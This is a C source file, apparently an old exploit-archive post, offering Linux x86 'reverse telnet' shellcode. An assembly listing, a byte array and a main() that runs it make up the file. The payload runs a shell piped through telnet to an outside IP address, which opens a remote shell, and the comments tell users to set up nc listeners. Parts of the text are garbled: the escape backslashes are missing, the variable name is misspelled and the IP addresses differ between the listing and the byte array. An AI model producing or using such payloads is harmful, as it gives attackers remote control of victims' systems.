/*
Reverse Telnet Shellcode by hts
*/
/*
jmp 0x31
popl %esi
movl %esi,0x4f(%esi)
leal 0x8(%esi),%ebx
movl %ebx,0x53(%esi)
leal 0xb(%esi),%ebx
movl %ebx,0x57(%esi)
xorl %eax,%eax
movb %eax,0x7(%esi)
movb %eax,0xa(%esi)
movb %eax,0x4e(%esi)
movl %eax,0x5b(%esi)
movb $0xb,%al
movl %esi,%ebx
leal 0x4f(%esi),%ecx
leal 0x5b(%esi),%edx
int $0x80
xorl %ebx,%ebx
movl %ebx,%eax
inc %eax
int $0x80
call -0x36
.string "/bin/sh -c /bin/telnet 200.182.207.235 5|/bin/sh|/bin/telnet 200.182.207.235 6"
*/
char shellcode[] =
"xebx31x5ex89x76x4fx8dx5ex08x89x5ex53"
"x8dx5ex0bx89x5ex57x31xc0x88x46x07x88"
"x46x0ax88x46x4ex89x46x5bxb0x0bx89xf3"
"x8dx4ex4fx8dx56x5bxcdx80x31xdbx89xd8"
"x40xcdx80xe8xcaxffxffxff/bin/sh -c /bin/"
"telnet 200.182.207.246 5|/bin/sh|/bin/telnet 200"
".182.207.246 6";
#define NAME "Reverse Telnet Shellcode - by hts"
void main(){
void (*s)() = (void *)hellcode;
printf("Shellcode length: %dnExecuting..nn", strlen(hellcode));
s();
}
/* I don't know if exists any reverse telnet shellcode..
* you should modify your ip addr to use it...
* to use it, nc -l -p 5 , on another terminal nc -l -p 6
* then run the shellcode with your ip addr or just 127.000.000.001
*/
// milw0rm.com [2004-09-26]